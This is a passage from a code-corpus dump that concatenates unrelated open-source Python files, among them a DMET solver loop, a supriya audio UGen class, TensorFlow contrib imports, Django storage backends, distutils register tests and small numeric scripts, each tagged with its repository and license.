iteration = 0
theDIIS = DIIS.DIIS(7)
numNonDIIS = 4
while ( normOfDiff >= threshold ):
iteration += 1
print "*** DMET iteration",iteration,"***"
if ( numImpOrbs > 1 ) and ( iteration > numNonDIIS ):
umat_new = theDIIS.Solve()
umat_old = np.array( umat_new, copy=True )
# Augment the Hamiltonian with the embedding potential
HamAugment = HamFull.HamFull(self.Ham, self.cluster_size, umat_new, self.skew2by2cell)
# Get the RHF ground state 1RDM and construct the bath orbitals
energiesRHF, solutionRHF = LinalgWrappers.RestrictedHartreeFock( HamAugment.Tmat, numPairs, True )
groundstate1RDM = DMETorbitals.Construct1RDM_groundstate( solutionRHF, numPairs )
dmetOrbs, NelecEnvironment, DiscOccupation = DMETorbitals.ConstructBathOrbitals( self.impurityOrbs, groundstate1RDM, numBathOrbs )
NelecActiveSpace = Nelectrons - NelecEnvironment # Floating point number
assert( abs( NelecActiveSpace - 2*numImpOrbs ) < 1e-8 ) # For ground-state DMET
NelecActiveSpace = int( round( NelecActiveSpace ) + 0.001 )
# Construct the DMET Hamiltonian and get the exact solution
HamDMET = DMETham.DMETham(self.Ham, HamAugment, dmetOrbs, self.impurityOrbs, numImpOrbs, numBathOrbs)
if (True):
numDMETorbs = HamDMET.getDmetNumOrbitals()
OEI = np.zeros([numDMETorbs, numDMETorbs], dtype=float)
for cnt1 in range(0, numDMETorbs):
for cnt2 in range(0, numDMETorbs):
OEI[cnt1,cnt2] = HamDMET.getTmatCorr(cnt1, cnt2)
energiesDMETOEI, solutionDMETOEI = LinalgWrappers.RestrictedHartreeFock( OEI, NelecActiveSpace/2, True )
print OEI
print energiesDMETOEI - np.average(energiesDMETOEI)
EnergyPerSiteCorr, OneRDMcorr, GSenergyFCI, GSvectorFCI = SolveCorrelated.SolveGS( HamDMET, NelecActiveSpace )
umat_new = MinimizeCostFunction.Minimize( umat_new, OneRDMcorr, HamDMET, NelecActiveSpace )
normOfDiff = np.linalg.norm( umat_new - umat_old )
if ( numImpOrbs > 1 ) and ( iteration >= numNonDIIS ):
error = umat_new - umat_old
error = np.reshape( error, error.shape[0]*error.shape[1] )
theDIIS.append( error, umat_new )
print " DMET :: The energy per site (correlated problem) =",EnergyPerSiteCorr
print " DMET :: The 2-norm of u_new - u_old =",normOfDiff
print "DMET :: Convergence reached. Converged u-matrix:"
print umat_new
print "***************************************************"
return ( EnergyPerSiteCorr , umat_new )
def SolveResponse( self, umat_guess, Nelectrons, omega, eta, numBathOrbs, toSolve, prefactResponseRDM=0.5 ):
# Define a few constants
numImpOrbs = np.sum( self.impurityOrbs )
assert( numBathOrbs >= numImpOrbs )
assert( Nelectrons%2==0 )
numPairs = Nelectrons / 2
assert( (toSolve=='A') or (toSolve=='R') or (toSolve=='F') or (toSolve=='B') ) # LDOS addition/removal or LDDR forward/backward
assert( (prefactResponseRDM>=0.0) and (prefactResponseRDM<=1.0) )
# Set up a few parameters for the self-consistent response DMET
umat_new = np.array( umat_guess, copy=True )
normOfDiff = 1.0
threshold = 1e-6 * numImpOrbs
maxiter = 1000
iteration = 0
theDIIS = DIIS.DIIS(7)
startedDIIS= False
while ( normOfDiff >= threshold ) and ( iteration < maxiter ):
iteration += 1
print "*** DMET iteration",iteration,"***"
if ( numImpOrbs > 1 ) and ( startedDIIS ):
umat_new = theDIIS.Solve()
umat_old = np.array( umat_new, copy=True )
# Augment the Hamiltonian with the embedding potential
HamAugment = HamFull.HamFull(self.Ham, self.cluster_size, umat_new, self.skew2by2cell)
# Get the RHF ground-state 1-RDM
energiesRHF, solutionRHF = LinalgWrappers.RestrictedHartreeFock( HamAugment.Tmat, numPairs, True )
if ( iteration == 1 ):
chemical_potential_mu = 0.5 * ( energiesRHF[ numPairs-1 ] + energiesRHF[ numPairs ] )
if ( toSolve == 'A' ) or ( toSolve == 'R' ):
omegabis = omega + chemical_potential_mu # Shift omega with the chemical potential for the retarded Green's function
else:
omegabis = omega
groundstate1RDM = DMETorbitals.Construct1RDM_groundstate( solutionRHF, numPairs )
# Get the RHF mean-field response 1-RDMs
response1RDMs = []
for orbital_i in self.impIndices:
if (toSolve=='A'):
response1RDM = DMETorbitals.Construct1RDM_addition( orbital_i, omegabis, eta, energiesRHF, solutionRHF, groundstate1RDM, numPairs )
if (toSolve=='R'):
response1RDM = DMETorbitals.Construct1RDM_removal( orbital_i, omegabis, eta, energiesRHF, solutionRHF, groundstate1RDM, numPairs )
if (toSolve=='F'):
response1RDM = DMETorbitals.Construct1RDM_forward( orbital_i, omegabis, eta, energiesRHF, solutionRHF, groundstate1RDM, numPairs )
if (toSolve=='B'):
response1RDM = DMETorbitals.Construct1RDM_backward( orbital_i, omegabis, eta, energiesRHF, solutionRHF, groundstate1RDM, numPairs )
response1RDMs.append( response1RDM )
HamDMETs = []
for orbital_i in range(0, numImpOrbs):
# The response1RDM was calculated based on a normalized wavefunction: make a weighted average
weighted1RDM_i = ( 1.0 - prefactResponseRDM ) * groundstate1RDM + prefactResponseRDM * response1RDMs[ orbital_i ]
# For each impurity site, there's a different set of DMET orbitals
dmetOrbs_i, NelecEnvironment_i, DiscOccupation_i = DMETorbitals.ConstructBathOrbitals( self.impurityOrbs, weighted1RDM_i, numBathOrbs )
NelecActiveSpaceGuess_i = int( round( Nelectrons - NelecEnvironment_i ) + 0.001 ) # Now it should be of integer type
if ( orbital_i == 0 ):
NelecActiveSpace = NelecActiveSpaceGuess_i
else:
assert( NelecActiveSpace == NelecActiveSpaceGuess_i )
print " DMET :: Response (impurity", orbital_i, ") : Number of electrons not in impurity or bath orbitals =", NelecEnvironment_i
print " DMET :: Response (impurity", orbital_i, ") : The sum of discarded occupations = sum( min( NOON, 2-NOON ) , pure environment orbitals ) =", DiscOccupation_i
HamDMET_i = DMETham.DMETham( self.Ham, HamAugment, dmetOrbs_i, self.impurityOrbs, numImpOrbs, numBathOrbs )
HamDMETs.append( HamDMET_i )
# Get the exact solution for each of the impurity orbitals
totalGFvalue = 0.0
averageGSenergyPerSite = 0.0
GS_1RDMs = []
RESP_1RDMs = []
for orbital_i in range(0, numImpOrbs):
GSenergyPerSite, GS_1RDM, GSenergyFCI, GSvectorFCI = SolveCorrelated.SolveGS( HamDMETs[ orbital_i ], NelecActiveSpace )
GFvalue, RESP_1RDM = SolveCorrelated.SolveResponse( HamDMETs[ orbital_i ], NelecActiveSpace, orbital_i, omegabis, eta, toSolve, GSenergyFCI, GSvectorFCI )
totalGFvalue += GFvalue
averageGSenergyPerSite += GSenergyPerSite
GS_1RDMs.append( GS_1RDM )
RESP_1RDMs.append( RESP_1RDM )
averageGSenergyPerSite = ( 1.0 * averageGSenergyPerSite ) / numImpOrbs
if ( iteration==1 ):
notSelfConsistentTotalGF = totalGFvalue
umat_new = MinimizeCostFunction.MinimizeResponse( umat_new, umat_old, GS_1RDMs, RESP_1RDMs, HamDMETs, NelecActiveSpace, omegabis, eta, toSolve, prefactResponseRDM )
normOfDiff = np.linalg.norm( umat_new - umat_old )
if ( numImpOrbs > 1 ) and (( normOfDiff < 1e-3 ) or ( startedDIIS )):
startedDIIS = True
error = umat_new - umat_old
error = np.reshape( error, error.shape[0]*error.shape[1] )
theDIIS.append( error, umat_new )
print " DMET :: The average ground-state energy per site =",averageGSenergyPerSite
print " DMET :: The Green's function value (correlated problem) =",totalGFvalue
print " DMET :: The 2-norm of u_new - u_old =",normOfDiff
print umat_new
print "DMET :: Convergence reached. Converged u-matrix:"
print umat_new
print "***************************************************"
return ( averageGSenergyPerSite, totalGFvalue, notSelfConsistentTotalGF )
| SebWouters/PyDMET | oldstuff/HubbardDMETshiwei.py | Python | gpl-2.0 | 12,673 |
# -*- encoding: utf-8 -*-
from supriya.tools.ugentools.MultiOutUGen import MultiOutUGen
class DecodeB2(MultiOutUGen):
r'''
::
>>> decode_b_2 = ugentools.DecodeB2.ar(
... channel_count=channel_count,
... orientation=0.5,
... w=w,
... x=x,
... y=y,
... )
>>> decode_b_2
DecodeB2.ar()
'''
### CLASS VARIABLES ###
__documentation_section__ = None
__slots__ = ()
_ordered_input_names = (
'channel_count',
'w',
'x',
'y',
'orientation',
)
_valid_calculation_rates = None
### INITIALIZER ###
def __init__(
self,
calculation_rate=None,
channel_count=None,
orientation=0.5,
w=None,
x=None,
y=None,
):
MultiOutUGen.__init__(
self,
calculation_rate=calculation_rate,
channel_count=channel_count,
orientation=orientation,
w=w,
x=x,
y=y,
)
### PUBLIC METHODS ###
@classmethod
def ar(
cls,
channel_count=None,
orientation=0.5,
w=None,
x=None,
y=None,
):
r'''Constructs an audio-rate DecodeB2.
::
>>> decode_b_2 = ugentools.DecodeB2.ar(
... channel_count=channel_count,
... orientation=0.5,
... w=w,
... x=x,
... y=y,
... )
>>> decode_b_2
DecodeB2.ar()
Returns ugen graph.
'''
from supriya.tools import synthdeftools
calculation_rate = synthdeftools.CalculationRate.AUDIO
ugen = cls._new_expanded(
calculation_rate=calculation_rate,
channel_count=channel_count,
orientation=orientation,
w=w,
x=x,
y=y,
)
return ugen
@classmethod
def kr(
cls,
channel_count=None,
orientation=0.5,
w=None,
x=None,
y=None,
):
r'''Constructs a control-rate DecodeB2.
::
>>> decode_b_2 = ugentools.DecodeB2.kr(
... channel_count=channel_count,
... orientation=0.5,
... w=w,
... x=x,
... y=y,
... )
>>> decode_b_2
DecodeB2.kr()
Returns ugen graph.
'''
from supriya.tools import synthdeftools
calculation_rate = synthdeftools.CalculationRate.CONTROL
ugen = cls._new_expanded(
calculation_rate=calculation_rate,
channel_count=channel_count,
orientation=orientation,
w=w,
x=x,
y=y,
)
return ugen
# def newFromDesc(): ...
### PUBLIC PROPERTIES ###
@property
def channel_count(self):
r'''Gets `channel_count` input of DecodeB2.
::
>>> decode_b_2 = ugentools.DecodeB2.ar(
... channel_count=channel_count,
... orientation=0.5,
... w=w,
... x=x,
... y=y,
... )
>>> decode_b_2.channel_count
Returns ugen input.
'''
index = self._ordered_input_names.index('channel_count')
return self._inputs[index]
@property
def orientation(self):
r'''Gets `orientation` input of DecodeB2.
::
>>> decode_b_2 = ugentools.DecodeB2.ar(
... channel_count=channel_count,
... orientation=0.5,
... w=w,
... x=x,
... y=y,
... )
>>> decode_b_2.orientation
0.5
Returns ugen input.
'''
index = self._ordered_input_names.index('orientation')
return self._inputs[index]
@property
def w(self):
r'''Gets `w` input of DecodeB2.
::
>>> decode_b_2 = ugentools.DecodeB2.ar(
... channel_count=channel_count,
... orientation=0.5,
... w=w,
... x=x,
... y=y,
... )
>>> decode_b_2.w
Returns ugen input.
'''
index = self._ordered_input_names.index('w')
return self._inputs[index]
@property
def x(self):
r'''Gets `x` input of DecodeB2.
::
>>> decode_b_2 = ugentools.DecodeB2.ar(
... channel_count=channel_count,
... orientation=0.5,
... w=w,
... x=x,
... y=y,
... )
>>> decode_b_2.x
Returns ugen input.
'''
index = self._ordered_input_names.index('x')
return self._inputs[index]
@property
def y(self):
r'''Gets `y` input of DecodeB2.
::
>>> decode_b_2 = ugentools.DecodeB2.ar(
... channel_count=channel_count,
... orientation=0.5,
... w=w,
... x=x,
... y=y,
... )
>>> decode_b_2.y
Returns ugen input.
'''
index = self._ordered_input_names.index('y')
return self._inputs[index] | andrewyoung1991/supriya | supriya/tools/pendingugentools/DecodeB2.py | Python | mit | 5,473 |
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""contrib module containing volatile or experimental code."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Add projects here, they will show up under tf.contrib.
from tensorflow.contrib import bayesflow
from tensorflow.contrib import cloud
from tensorflow.contrib import cluster_resolver
from tensorflow.contrib import compiler
from tensorflow.contrib import copy_graph
from tensorflow.contrib import crf
from tensorflow.contrib import cudnn_rnn
from tensorflow.contrib import data
from tensorflow.contrib import deprecated
from tensorflow.contrib import distributions
from tensorflow.contrib import estimator
from tensorflow.contrib import factorization
from tensorflow.contrib import framework
from tensorflow.contrib import gan
from tensorflow.contrib import graph_editor
from tensorflow.contrib import grid_rnn
from tensorflow.contrib import image
from tensorflow.contrib import input_pipeline
from tensorflow.contrib import integrate
from tensorflow.contrib import keras
from tensorflow.contrib import kernel_methods
from tensorflow.contrib import labeled_tensor
from tensorflow.contrib import layers
from tensorflow.contrib import learn
from tensorflow.contrib import legacy_seq2seq
from tensorflow.contrib import linalg
from tensorflow.contrib import linear_optimizer
from tensorflow.contrib import lookup
from tensorflow.contrib import losses
from tensorflow.contrib import memory_stats
from tensorflow.contrib import metrics
from tensorflow.contrib import nccl
from tensorflow.contrib import nn
from tensorflow.contrib import opt
from tensorflow.contrib import predictor
from tensorflow.contrib import quantization
from tensorflow.contrib import reduce_slice_ops
from tensorflow.contrib import resampler
from tensorflow.contrib import rnn
from tensorflow.contrib import saved_model
from tensorflow.contrib import seq2seq
from tensorflow.contrib import signal
from tensorflow.contrib import slim
from tensorflow.contrib import solvers
from tensorflow.contrib import sparsemax
from tensorflow.contrib import staging
from tensorflow.contrib import stat_summarizer
from tensorflow.contrib import stateless
from tensorflow.contrib import tensor_forest
from tensorflow.contrib import tensorboard
from tensorflow.contrib import testing
from tensorflow.contrib import tfprof
from tensorflow.contrib import timeseries
from tensorflow.contrib import tpu
from tensorflow.contrib import training
from tensorflow.contrib import util
from tensorflow.contrib.ndlstm import python as ndlstm
from tensorflow.contrib.remote_fused_graph import pylib as remote_fused_graph
from tensorflow.contrib.specs import python as specs
from tensorflow.python.util.lazy_loader import LazyLoader
ffmpeg = LazyLoader("ffmpeg",
globals(), "tensorflow.contrib.ffmpeg")
del LazyLoader
del absolute_import
del division
del print_function
| tornadozou/tensorflow | tensorflow/contrib/__init__.py | Python | apache-2.0 | 3,590 |
from tornado import web
from handlers.BaseHandler import BaseHandler, wrap_async_rpc, wrap_catch
from core import FM
class LogoutHandler(BaseHandler):
def data_received(self, chunk):
pass
@wrap_async_rpc
@wrap_catch
@web.authenticated
def post(self):
action = self.get_action(name=FM.Actions.LOGOUT)
response = action.run()
self.json(response)
self.finish()
| f-andrey/sprutio | app/handlers/actions/main/LogoutHandler.py | Python | gpl-3.0 | 424 |
import logging
import urllib2
import urlparse
from django.conf import settings
from django.core.files.storage import Storage
from django.core.files.base import ContentFile
from django.core.exceptions import ImproperlyConfigured
from django.utils.http import urlquote
from django.core.cache import cache
from storages.backends.s3boto import S3BotoStorage
from imagekit.cachefiles.backends import CachedFileBackend
from queued_storage.utils import import_attribute
logger = logging.getLogger(__name__)
class ReadOnlyHttpStorage(Storage):
""" Read-only file storage that downloads files over HTTP.
:param prefix: URL prefix. Paths are appended to the prefix to get the
full URL.
"""
def __init__(self, prefix=None):
self.prefix = prefix
if not self.prefix:
self.prefix = settings.HTTP_STORAGE_URL
if not self.prefix or not self.prefix.startswith('http://'):
raise ImproperlyConfigured(
"ReadOnlyHttpStorage expects a HTTP URL, not '%s'" % self.prefix)
if not self.prefix.endswith("/"):
self.prefix = self.prefix + "/"
def listdir(self, name):
raise NotImplementedError()
def size(self, name):
raise NotImplementedError()
def exists(self, name):
if name:
url = self.url(name)
try:
urllib2.urlopen(url)
return True # URL Exist
except ValueError:
return False # URL not well formatted
except urllib2.URLError:
return False # URL don't seem to be alive
else:
return False
def url(self, name):
if name:
return urlparse.urljoin(self.prefix, urlquote(name))
else:
return ""
def _open(self, name, mode='rb'):
if 'w' in mode:
raise IOError("Cannot write to read-only http storage")
url = self.url(name)
file_content = urllib2.urlopen(url).read()
return ContentFile(file_content)
def delete(self, name):
raise IOError("Cannot write to read-only http storage")
def save(self, name, content):
raise IOError("Cannot write to read-only http storage")
def _save(self, name, content):
raise IOError("Cannot write to read-only http storage")
class OpenSurfacesStorage(Storage):
"""
Special filesystem for OpenSurfaces that serves files locally, downloading
remote data as needed from the public OpenSurfaces S3 repository. Since we
pay for bandwidth, we would appreciate if you did not try and replace this
with some system that no longer cached downloads locally.
:param local: optionally, specify a different local storage. Use ``None``
to use ``settings.OPENSURFACES_LOCAL_STORAGE`` (default: filesystem
storage that saves in ``media/``). **Note:** we assume that checking
``exists()`` on the local storage is fast. If this is not the case
(e.g. you are using S3 as the local filesystem), then you should extend
this class to cache info about which files exist.
:param readonly: if ``True``, do not allow writes.
:param cache_prefix: prefix for cache, to avoid clashes with other systems
that use the cache.
:param cache_timeout: timeout for cache. If a download takes longer than this,
it will be restarted.
"""
def __init__(self, local=None, readonly=False, cache_prefix=None,
cache_timeout=300):
self.local = local
self.readonly = readonly
self.cache_prefix = cache_prefix
self.cache_timeout = cache_timeout
if not self.cache_prefix:
self.cache_prefix = 'OpenSurfacesStorage'
if not self.local:
self.local = import_attribute(settings.OPENSURFACES_LOCAL_STORAGE)()
self.remote = ReadOnlyHttpStorage(prefix=settings.OPENSURFACES_REMOTE_STORAGE_URL)
def get_cache_key(self, name):
return '%s:%s' % (self.cache_prefix, name)
def ensure_local(self, name, async=False):
"""
Ensure that the file has been transferred to our local filesystem.
"""
if async:
# use a cache to avoid double downloading. Storing "True' in the
# cache indicates that a remote transfer has been queued.
cache_key = self.get_cache_key(name)
if not cache.get(cache_key):
cache.set(cache_key, True, self.cache_timeout)
from common.tasks import opensurfaces_storage_transfer
opensurfaces_storage_transfer.delay(name)
else:
if not self.local.exists(name) and self.remote.exists(name):
#logger.debug("Transferring '%s' to local storage" % name)
self.local.save(name, self.remote.open(name))
def listdir(self, name):
raise NotImplementedError()
def exists(self, name):
return self.local.exists(name) or self.remote.exists(name)
def size(self, name):
self.ensure_local(name)
return self.local.size(name)
def delete(self, name):
""" We cannot delete since a missing file is indistinguishable from
not-yet-downloading. """
raise IOError("Cannot delete from read-only http storage")
def url(self, name):
if self.local.exists(name):
return self.local.url(name)
else:
self.ensure_local(name, async=True)
return self.remote.url(name)
def _open(self, name, mode='rb'):
if 'w' in mode and self.readonly:
raise IOError("Cannot write to read-only http storage")
self.ensure_local(name)
return self.local.open(name, mode)
def _save(self, name, content):
if self.readonly:
raise IOError("Cannot write to read-only http storage")
else:
return self.local.save(name, content)
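# Illustrative Django settings consumed by OpenSurfacesStorage (values are hypothetical):
# OPENSURFACES_LOCAL_STORAGE = 'django.core.files.storage.FileSystemStorage'
# OPENSURFACES_REMOTE_STORAGE_URL = 'http://example.com/opensurfaces/'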
class ReducedRedundancyS3BotoStorage(S3BotoStorage):
"""
Amazon S3 storage with reduced redundancy
"""
def __init__(self, *args, **kwargs):
super(ReducedRedundancyS3BotoStorage, self).__init__(
reduced_redundancy=True, *args, **kwargs)
class ReadOnlyS3BotoStorage(S3BotoStorage):
"""
Amazon S3 storage with write disabled
"""
def delete(self, name):
logger.info("Prevented file delete: %s" % name)
def save(self, name, content):
logger.info("Prevented file save: %s" % name)
def _save(self, name, content):
logger.info("Prevented file save: %s" % name)
class ImageKitFileBackend(CachedFileBackend):
"""
This fixes problems with the default ImageKit backend.
The default ImageKit backend is doing something weird with file_exists.
It returns False when the file exists. It also seems to have some race conditions.
"""
def file_exists(self, file):
key = self.get_key(file)
exists = self.cache.get(key)
if exists is None:
exists = not file.closed or file.storage.exists(file.name)
self.cache.set(key, exists, 2592000)
return exists
def ensure_exists(self, file):
if not self.file_exists(file):
self.create(file)
def create(self, file):
key = self.get_key(file)
key_lock = key + '_lock'
if self.cache.add(key_lock, True, 300):
try:
file.generate(force=True)
self.cache.set(key, True, 2592000)
finally:
self.cache.delete(key_lock)
else:
logger.debug('Thumbnail creation already started')
| seanbell/opensurfaces | server/common/backends.py | Python | mit | 7,686 |
# coding=utf-8
# Copyright 2022 The ML Fairness Gym Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python2, python3
"""Tests for multinomial_spaces.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import absltest
from spaces import multinomial
import numpy as np
from six.moves import range
class MultinomialTest(absltest.TestCase):
def setUp(self):
self.n = 15 # number of trials
self.k = 6 # number of categories
self.multinomial_space = multinomial.Multinomial(self.k, self.n)
self.multinomial_space.seed(0)
super(MultinomialTest, self).setUp()
def test_sample_sum(self):
n_trials = 100
samples = [self.multinomial_space.sample() for _ in range(n_trials)]
sums_to_n = [np.sum(sample) == self.n for sample in samples]
self.assertTrue(np.all(sums_to_n))
def test_sample_distribution(self):
n_trials = 100
samples = [self.multinomial_space.sample() for _ in range(n_trials)]
# check roughly uniform distribution by checking means for each category
# are within 3*std dev of the expected mean
expected_mean = float(self.n) / self.k
means = np.mean(samples, axis=0)
std = np.std(means)
near_mean = np.asarray(
[np.abs(mean - expected_mean) < 3.0 * std for mean in means])
self.assertTrue(np.all(near_mean))
def test_contains_correct_n_in_vector(self):
# check a vector is contained even if it has n as one of its values.
n = 1 # number of trials
k = 2 # number of categories
multinomial_space = multinomial.Multinomial(k, n)
is_contained_vector = np.asarray([1, 0], dtype=np.uint32)
self.assertTrue(multinomial_space.contains(is_contained_vector))
def test_contains_correct(self):
is_contained_vector = np.asarray([2, 3, 2, 3, 3, 2], dtype=np.uint32)
self.assertTrue(self.multinomial_space.contains(is_contained_vector))
def test_contains_incorrect_length(self):
# check vector with incorrect length is not contained
not_contained_vector = np.asarray([3, 3, 3, 3, 3], dtype=np.uint32)
self.assertFalse(self.multinomial_space.contains(not_contained_vector))
def test_contains_incorrect_sum(self):
# check vector with incorrect sum is not contained
not_contained_vector = np.asarray([3, 3, 3, 3, 3, 3], dtype=np.uint32)
self.assertFalse(self.multinomial_space.contains(not_contained_vector))
def test_contains_incorrect_dtype(self):
# check vector with wrong dtype is not contained
not_contained_vector = np.asarray([2.0, 3.0, 2.0, 3.0, 3.5, 1.5])
self.assertFalse(self.multinomial_space.contains(not_contained_vector))
def test_contains_samples(self):
n_trials = 100
samples = [self.multinomial_space.sample() for _ in range(n_trials)]
contains_samples = [
self.multinomial_space.contains(sample) for sample in samples
]
self.assertTrue(np.all(contains_samples))
if __name__ == '__main__':
absltest.main()
| google/ml-fairness-gym | spaces/multinomial_test.py | Python | apache-2.0 | 3,523 |
import math
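# Project Euler problem 39: for integer right triangles with perimeter n = a + b + c,
# find the n <= 1000 that maximises the number of solutions.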
def f(n):
solutions = []
for a in xrange(1, n / 2):
aa = a**2
for b in xrange(a, n / 2):
bb = b**2
sqrt = math.sqrt(aa + bb)
if a + b + sqrt == n and sqrt == int(sqrt):
solutions.append([a, b, int(sqrt)])
return len(solutions)
count = [ f(i) for i in range(1, 1001) ]
print count.index(max(count)) + 1
| ericdahl/project-euler | python/p039.py | Python | bsd-3-clause | 412 |
import numpy as np
import matplotlib.pyplot as plt
import scipy.optimize as opt
# Define the function to fit
f = lambda x, A, B: A * np.exp(B * x)
data = np.loadtxt('../data/boltz.dat', skiprows=1, delimiter=',')
# Call curve_fit, where
# - sigma: list of errors on the y coordinate
# - p0: initial guesses for the parameters (in the same order as in the function definition)
popt, cov = opt.curve_fit(
f, data[:, 0], data[:, 1], sigma=data[:, 3], p0=[1, 1e-10])
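# Note: by default curve_fit treats sigma as relative weights (absolute_sigma=False);
# pass absolute_sigma=True if the y-errors are absolute 1-sigma uncertainties.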
# The errors are the square roots of the diagonal elements of the covariance matrix
perr = np.sqrt(np.diag(cov))
print(popt)
print(perr)
plt.errorbar(data[:, 0], data[:, 1], xerr=data[:, 2], yerr=data[:, 3])
plt.plot(data[:, 0], f(data[:, 0], popt[0], popt[1]))
plt.show()
| ntadej/racorodja | python/fit.py | Python | mit | 711 |
"""Tests for distutils.command.register."""
# -*- encoding: utf8 -*-
import sys
import os
import unittest
import getpass
import urllib2
import warnings
from test.test_support import check_warnings, run_unittest
from distutils.command import register as register_module
from distutils.command.register import register
from distutils.core import Distribution
from distutils.errors import DistutilsSetupError
from distutils.tests import support
from distutils.tests.test_config import PYPIRC, PyPIRCCommandTestCase
PYPIRC_NOPASSWORD = """\
[distutils]
index-servers =
server1
[server1]
username:me
"""
WANTED_PYPIRC = """\
[distutils]
index-servers =
pypi
[pypi]
username:tarek
password:password
"""
class RawInputs(object):
"""Fakes user inputs."""
def __init__(self, *answers):
self.answers = answers
self.index = 0
def __call__(self, prompt=''):
try:
return self.answers[self.index]
finally:
self.index += 1
class FakeOpener(object):
"""Fakes a PyPI server"""
def __init__(self):
self.reqs = []
def __call__(self, *args):
return self
def open(self, req):
self.reqs.append(req)
return self
def read(self):
return 'xxx'
class RegisterTestCase(PyPIRCCommandTestCase):
def setUp(self):
super(RegisterTestCase, self).setUp()
# patching the password prompt
self._old_getpass = getpass.getpass
def _getpass(prompt):
return 'password'
getpass.getpass = _getpass
self.old_opener = urllib2.build_opener
self.conn = urllib2.build_opener = FakeOpener()
def tearDown(self):
getpass.getpass = self._old_getpass
urllib2.build_opener = self.old_opener
super(RegisterTestCase, self).tearDown()
def _get_cmd(self, metadata=None):
if metadata is None:
metadata = {'url': 'xxx', 'author': 'xxx',
'author_email': 'xxx',
'name': 'xxx', 'version': 'xxx'}
pkg_info, dist = self.create_dist(**metadata)
return register(dist)
def test_create_pypirc(self):
# this test makes sure a .pypirc file
# is created when requested.
# let's create a register instance
cmd = self._get_cmd()
# we shouldn't have a .pypirc file yet
self.assertTrue(not os.path.exists(self.rc))
# patching raw_input and getpass.getpass
# so register gets happy
#
# Here's what we are faking :
# use your existing login (choice 1.)
# Username : 'tarek'
# Password : 'password'
# Save your login (y/N)? : 'y'
inputs = RawInputs('1', 'tarek', 'y')
register_module.raw_input = inputs.__call__
# let's run the command
try:
cmd.run()
finally:
del register_module.raw_input
# we should have a brand new .pypirc file
self.assertTrue(os.path.exists(self.rc))
# with the content similar to WANTED_PYPIRC
f = open(self.rc)
try:
content = f.read()
self.assertEqual(content, WANTED_PYPIRC)
finally:
f.close()
# now let's make sure the .pypirc file generated
# really works : we shouldn't be asked anything
# if we run the command again
def _no_way(prompt=''):
raise AssertionError(prompt)
register_module.raw_input = _no_way
cmd.show_response = 1
cmd.run()
# let's see what the server received : we should
# have 2 similar requests
self.assertEqual(len(self.conn.reqs), 2)
req1 = dict(self.conn.reqs[0].headers)
req2 = dict(self.conn.reqs[1].headers)
self.assertEqual(req2['Content-length'], req1['Content-length'])
self.assertTrue('xxx' in self.conn.reqs[1].data)
def test_password_not_in_file(self):
self.write_file(self.rc, PYPIRC_NOPASSWORD)
cmd = self._get_cmd()
cmd._set_config()
cmd.finalize_options()
cmd.send_metadata()
# dist.password should be set
# therefore used afterwards by other commands
self.assertEqual(cmd.distribution.password, 'password')
def test_registering(self):
# this test runs choice 2
cmd = self._get_cmd()
inputs = RawInputs('2', 'tarek', 'tarek@ziade.org')
register_module.raw_input = inputs.__call__
try:
# let's run the command
cmd.run()
finally:
del register_module.raw_input
        # we should have sent a request
self.assertEqual(len(self.conn.reqs), 1)
req = self.conn.reqs[0]
headers = dict(req.headers)
self.assertEqual(headers['Content-length'], '608')
self.assertTrue('tarek' in req.data)
def test_password_reset(self):
# this test runs choice 3
cmd = self._get_cmd()
inputs = RawInputs('3', 'tarek@ziade.org')
register_module.raw_input = inputs.__call__
try:
# let's run the command
cmd.run()
finally:
del register_module.raw_input
        # we should have sent a request
self.assertEqual(len(self.conn.reqs), 1)
req = self.conn.reqs[0]
headers = dict(req.headers)
self.assertEqual(headers['Content-length'], '290')
self.assertTrue('tarek' in req.data)
def test_strict(self):
        # testing the strict option
        # when on, the register command stops if
        # the metadata is incomplete or if
        # long_description is not reST compliant
# empty metadata
cmd = self._get_cmd({})
cmd.ensure_finalized()
cmd.strict = 1
self.assertRaises(DistutilsSetupError, cmd.run)
        # we don't test the reST feature if docutils
# is not installed
try:
import docutils
except ImportError:
return
# metadata are OK but long_description is broken
metadata = {'url': 'xxx', 'author': 'xxx',
'author_email': u'éxéxé',
'name': 'xxx', 'version': 'xxx',
'long_description': 'title\n==\n\ntext'}
cmd = self._get_cmd(metadata)
cmd.ensure_finalized()
cmd.strict = 1
self.assertRaises(DistutilsSetupError, cmd.run)
# now something that works
metadata['long_description'] = 'title\n=====\n\ntext'
cmd = self._get_cmd(metadata)
cmd.ensure_finalized()
cmd.strict = 1
inputs = RawInputs('1', 'tarek', 'y')
register_module.raw_input = inputs.__call__
# let's run the command
try:
cmd.run()
finally:
del register_module.raw_input
        # strict is off by default
cmd = self._get_cmd()
cmd.ensure_finalized()
inputs = RawInputs('1', 'tarek', 'y')
register_module.raw_input = inputs.__call__
# let's run the command
try:
cmd.run()
finally:
del register_module.raw_input
def test_check_metadata_deprecated(self):
# makes sure make_metadata is deprecated
cmd = self._get_cmd()
with check_warnings() as w:
warnings.simplefilter("always")
cmd.check_metadata()
self.assertEqual(len(w.warnings), 1)
def test_suite():
return unittest.makeSuite(RegisterTestCase)
if __name__ == "__main__":
run_unittest(test_suite())
| ktan2020/legacy-automation | win/Lib/distutils/tests/test_register.py | Python | mit | 7,870 |
# -*- coding: utf-8 -*-
"""
-------------------------------------------------
File Name: ProxyHandler.py
Description :
Author : JHao
date: 2016/12/3
-------------------------------------------------
Change Activity:
2016/12/03:
                   2020/05/26: distinguish between http and https
-------------------------------------------------
"""
__author__ = 'JHao'
from helper.proxy import Proxy
from db.dbClient import DbClient
from handler.configHandler import ConfigHandler
class ProxyHandler(object):
